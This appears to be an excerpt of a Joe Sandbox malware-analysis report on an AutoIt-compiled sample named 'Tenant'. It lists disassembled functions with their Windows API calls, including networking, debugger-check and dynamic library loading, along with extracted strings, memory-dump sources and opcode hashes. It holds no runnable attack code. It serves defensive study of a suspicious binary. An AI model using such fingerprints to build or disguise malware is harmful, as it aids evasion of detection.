                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: b2e7f9489818e876d202e9c95685190e0b506349616a7038531514a041363df2
                                                                                        • Instruction ID: 174c39708f946c96e31f82a36f9abbd3be341794bda6b33f2bf74cb099578075
                                                                                        • Opcode Fuzzy Hash: b2e7f9489818e876d202e9c95685190e0b506349616a7038531514a041363df2
                                                                                        • Instruction Fuzzy Hash: 1211E070501225BAEB298F518C89EFBFBECFF05391F5081AAF90582100E37068E4DAF0
                                                                                        Function 00B18475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B186E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B1849D,?,00000000,?,?), ref: 00B186F7
                                                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00B184DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 2496851823-2422070025
                                                                                        • Opcode ID: dd0f8d15cc73a815cc966941d6904a0cd2fe32ffa00499b4cd8f3e5c6b19b801
                                                                                        • Instruction ID: ed6ca8f0ad0bf5892c40a672bd86124f1946a5cffe9efb26b6c0ba589a75cf83
                                                                                        • Opcode Fuzzy Hash: dd0f8d15cc73a815cc966941d6904a0cd2fe32ffa00499b4cd8f3e5c6b19b801
                                                                                        • Instruction Fuzzy Hash: 4C11827510020AABDB10AF64C846FEEB768FF14310F504566FA1557392DF71A854C655
                                                                                        Function 00AF99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF9A2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: 05910ea5f158c7e7bb49a4e1e071e22c5ed21503da44d192df95d8421ca41a2d
                                                                                        • Instruction ID: 0bb0ecf4f6a6e9c7b2a7520abf97aa403966138aa6805b91020a0fcab555b074
                                                                                        • Opcode Fuzzy Hash: 05910ea5f158c7e7bb49a4e1e071e22c5ed21503da44d192df95d8421ca41a2d
                                                                                        • Instruction Fuzzy Hash: 5601F571A52118AB8B14FBA4CD62DFF777DAF56360B500709F961532D2EE3158088660
                                                                                        Function 00B0934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 1988441806-3962188686
                                                                                        • Opcode ID: c69047e33816223bfc9ed0e2d24490382e01cfa671d1796cb240298a8b803084
                                                                                        • Instruction ID: b9acfaea3bc9b0a7ab1b1591ad6d69339667a1460902f52001942ba25d715360
                                                                                        • Opcode Fuzzy Hash: c69047e33816223bfc9ed0e2d24490382e01cfa671d1796cb240298a8b803084
                                                                                        • Instruction Fuzzy Hash: 4C01B972D042587EDB28C6A8CC56FBEBBF8DB15301F00419EF552D21C2E575E6089B60
                                                                                        Function 00AF98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF9923
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: bd21c7951afaf863b44e359240b99284ed2533c24773f7bcb406314cb76b8792
                                                                                        • Instruction ID: 127d6b53532f9eed55ce2f48d4e5b20788a10fed7c20c4252ed296ac3555f2d5
                                                                                        • Opcode Fuzzy Hash: bd21c7951afaf863b44e359240b99284ed2533c24773f7bcb406314cb76b8792
                                                                                        • Instruction Fuzzy Hash: A801A771A5210C6BCB14FBE0DAA2FFF77BC9F15340F500159B94263292EA515E0C96B1
                                                                                        Function 00AF993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF99A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        • Opcode ID: a4cfea566042c5dcded5b41f091a0e9b92f3c82672582f25df24cf73c3ecef68
                                                                                        • Instruction ID: adfc49893ed923383073821905999cc52895650bcb26c3b80e1b45314df81bb1
                                                                                        • Opcode Fuzzy Hash: a4cfea566042c5dcded5b41f091a0e9b92f3c82672582f25df24cf73c3ecef68
                                                                                        • Instruction Fuzzy Hash: 1001A772A4210C6BCB10EBE4CA92FFF77AC9F15340F500159B94573292DA555F089671
                                                                                        Function 00B054E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: f2766608a16209fab32958e723b81bb7236c1a65b564cb71d2d2d4ec8e55bc68
                                                                                        • Instruction ID: 1c9b32601969b7bce695561a58a0e7796816fb852f711b4ad290ab11f57b3a5c
                                                                                        • Opcode Fuzzy Hash: f2766608a16209fab32958e723b81bb7236c1a65b564cb71d2d2d4ec8e55bc68
                                                                                        • Instruction Fuzzy Hash: 3DE0D17350022D57D720E659AC45FABFBECDB55771F010157FD04D7051D960D94587E0
                                                                                        Function 00AF8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AF88A0
                                                                                          • Part of subcall function 00AC3588: _doexit.LIBCMT ref: 00AC3592
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: ccf761235c371540ccef1fa004fd1e05cfacde049dc68bf6d2c35694e8759d26
                                                                                        • Instruction ID: cf4465dfb53a98dffc1c92de7726fc4522916e3b7b1dfd823d9ff1f5de5f377b
                                                                                        • Opcode Fuzzy Hash: ccf761235c371540ccef1fa004fd1e05cfacde049dc68bf6d2c35694e8759d26
                                                                                        • Instruction Fuzzy Hash: D6D05B3238535C36D21533E56D1BFDA7B8C8F05B91F10446AFB08651D38DD5899041D5
                                                                                        Function 00ADB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00ADB544: _memset.LIBCMT ref: 00ADB551
                                                                                          • Part of subcall function 00AC0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB520,?,?,?,00AA100A), ref: 00AC0B79
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB524
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB533
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB52E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 3158253471-631824599
                                                                                        • Opcode ID: 9db7bf81733b9868d1d52572916e3ec4be0f75f4dcffa5bc104f904459cda5eb
                                                                                        • Instruction ID: 0b90a9b835a9d21c43cbc060751286f98d01f9c559a8e88b7f689cc0a5b9b5aa
                                                                                        • Opcode Fuzzy Hash: 9db7bf81733b9868d1d52572916e3ec4be0f75f4dcffa5bc104f904459cda5eb
                                                                                        • Instruction Fuzzy Hash: 26E06D70250711CBD320AF29E905B46BAE4AF04704F15896EE447C3780DBB5D504CBA1
                                                                                        Function 00AE0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00AE0091
                                                                                          • Part of subcall function 00B1C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AE027A,?), ref: 00B1C6E7
                                                                                          • Part of subcall function 00B1C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C6F9
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AE0289
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 582185067-3257408948
                                                                                        • Opcode ID: f6950c16ff367791692c8b612cec31a3601443a4bd1232f31307e490792c379e
                                                                                        • Instruction ID: a5ce2a9eeac27992d485de869eeb3a7703953775514a96fa39f69fdac118bcd3
                                                                                        • Opcode Fuzzy Hash: f6950c16ff367791692c8b612cec31a3601443a4bd1232f31307e490792c379e
                                                                                        • Instruction Fuzzy Hash: C2F0C971855149DFCB16DBA1C998BEDBBF8AF48300F640085E146B7190CBB54F84DF21
                                                                                        Function 00B09EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00B09EB5
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B09ECC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 4c2a1686b76ebc8818b7d8e5ca7d94b64af07ba016395f0388713fc626d109bb
                                                                                        • Instruction ID: 7e37e788a886b603d51d1a202329eec4fa0c54e573e2541815eebf151da1bc12
                                                                                        • Opcode Fuzzy Hash: 4c2a1686b76ebc8818b7d8e5ca7d94b64af07ba016395f0388713fc626d109bb
                                                                                        • Instruction Fuzzy Hash: C1D05E7558030DABDB60AB90DC0EFDFBB6CDF04701F1042E1BE58921A2DE7055988B91